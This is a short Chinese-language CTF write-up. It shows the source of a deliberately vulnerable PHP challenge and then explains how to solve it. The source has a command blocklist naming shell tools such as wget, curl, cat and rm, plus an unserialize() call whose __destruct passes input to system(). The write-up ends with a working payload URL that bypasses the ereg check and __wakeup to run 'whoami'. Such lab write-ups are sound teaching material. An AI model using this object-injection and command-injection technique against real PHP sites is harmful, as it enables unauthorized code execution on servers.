好久没有玩过ctf了 搞一搞
先贴源码
index.php
<?php error_reporting(0); include 'class.php'; include 'waf.php'; if(@$_GET['file']){ $file = $_GET['file']; waf($file); }else{ $file = "Welcome"; } if($_GET['id'] === '1'){ include 'welcome/nothing.php'; die(); } $secret = $_GET['secret']; $ad = $_GET['ad']; if(isset($ad)){ if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE) { echo '<script>alert("Sorry ! Again !")</script>'; } elseif(strpos($ad, '--') !== FALSE) { echo "Ok Evrything will be fine!<br ><br >"; if (stripos($secret, './') > 0) { die(); } unserialize($secret); } else { echo '<script>alert("Sorry ! You must have --")</script>'; } } ?> <?php if($file == "Welcome"){ require_once 'welcome/welcome.php'; }else{ if(!file_exists("./import/$file.php")){ die("The file does not exit !"); }elseif(!system("php ./import/$file.php")){ die('Something was wrong ! But it is ok! ignore it :)'); } } ?>
waf.php
<?php error_reporting(0); function waf($values){ //$black = []; $black = array('vi','awk','-','sed','comm','diff','grep','cp','mv','nl','less','od','cat','head','tail','more','tac','rm','ls','tailf',' ','%','%0a','%0d','%00','ls','echo','ps','>','<','${IFS}','ifconfig','mkdir','cp','chmod','wget','curl','http','www','`','printf'); foreach ($black as $key => $value) { if(stripos($values,$value)){ die("Attack!"); } if (!ctype_alnum($values)) { die("Attack!"); } } } ?>
class.php
<?php error_reporting(0); class Record{ public $file="Welcome"; public function __construct($file) { $this->file = $file; } public function __sleep() { $this->file = 'sleep.txt'; return array('file'); } public function __wakeup() { $this->file = 'wakeup.txt'; } public function __destruct() { if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') { system("$this->file"); }else{ echo "<?php Something destroyed ?>"; } } }
其实这题就是考察的基础命令注入和基础反序列化
首先我们看到class.php里面system函数
显然出题人是想让我们从这里突破 这里用到windows的&命令 前一个命令正确继续执行下一个命令
我们可以构造payload
flag.php&whoami&
好的触发点我们看完了 接下来看如何触发
触发payload
http://www.zhong.com/ctf/index.php?ad[]=1Aa)--&file=Welcome&secret=O:6:"Record":2:{s:4:"file";s:6:"whoami";}
其实就是考察几个php函数的漏洞和复现一下反序列化。。。